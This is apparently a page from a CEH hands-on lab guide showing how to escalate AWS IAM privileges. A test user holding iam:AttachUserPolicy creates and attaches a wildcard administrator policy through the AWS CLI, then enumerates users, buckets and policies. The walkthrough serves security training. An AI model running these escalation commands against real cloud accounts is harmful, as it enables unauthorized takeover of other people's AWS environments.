4. Perform Privilege Escalation to Gain Higher Privileges

In the cloud platform, owing to mistakes in the access allocation system such as coding errors and design flaws, a customer, a third party, or an employee can obtain higher access rights than those th

1. Escalata IAM privilege by exploiting misconfigured user policy

A policy is an entity that, when attached to an identity or resource, defines its permissions. You can use the AWS Management Console, AWS CLI, or AWS API to create customer-managed policies in IAM. Customer-managed policies are standalone policies that you administer in your AWS account. You can then attach the policies to the identities (users, groups, and roles) in your AWS account. If the user policies are not configured properly, they can be exploited by attackers to gain full administrator access to the target user’s AWS account.

Before starting this task, create an IAM user (Test) with default settings and create a policy (Test) with permissions including, iam:AttachUserPolicy, iam:ListUserPolicies, sts:AssumeRole, and iam:ListRoles, as shown in the below screenshot. These policies can be exploited by attackers to gain administrator-level privileges.

In the terminal window, type vim user-policy.json and press Enter.

This command will create a file named user-policy in the attacker directory.

A command line text editor appears; press I and type the script given below:

"Version":"2012-10-17",

"Statement": [

    "Effect":"Allow",

    "Action":"*",

    "Resource":"*"

}
]

This is an AdministratorAccess policy that gives administrator access to the target IAM user. After entering the script given in the previous step, press the Esc button. Then, type :wq! and press Enter to save the text document.

Now, we will attach the created policy (user-policy) to the target IAM user’s account. To do so, type

aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

The created user policy is displayed, showing various details such as PolicyName, PolicyId, and Arn

In the terminal, type

aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy

The above command will attach the policy (user-policy) to the target IAM user account (here, test).

Now, type

aws iam list-attached-user-policies --user-name

It will show all attached policies.

The result appears, displaying the attached policy name (user-policy), as shown in the screenshot.

Now that you have successfully escalated the privileges of the target IAM user account, you can list all the IAM users in the AWS environment. To do so, type aws iam list-users and press Enter.

Similarly, you can use various commands to obtain complete information about the AWS environment such as the list of S3 buckets, user policies, role policies, and group policies, as well as to create a new user.

List of S3 buckets: aws s3api list-buckets --query "Buckets[].Name"
User Policies: aws iam list-user-policies
Role Policies: aws iam list-role-policies
Group policies: aws iam list-group-policies
Create user: aws iam create-user

Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy

Previous3. Exploit S3 buckets Next5. Perform Vulnerability Assessment on Docker Images

Last updated 1 month ago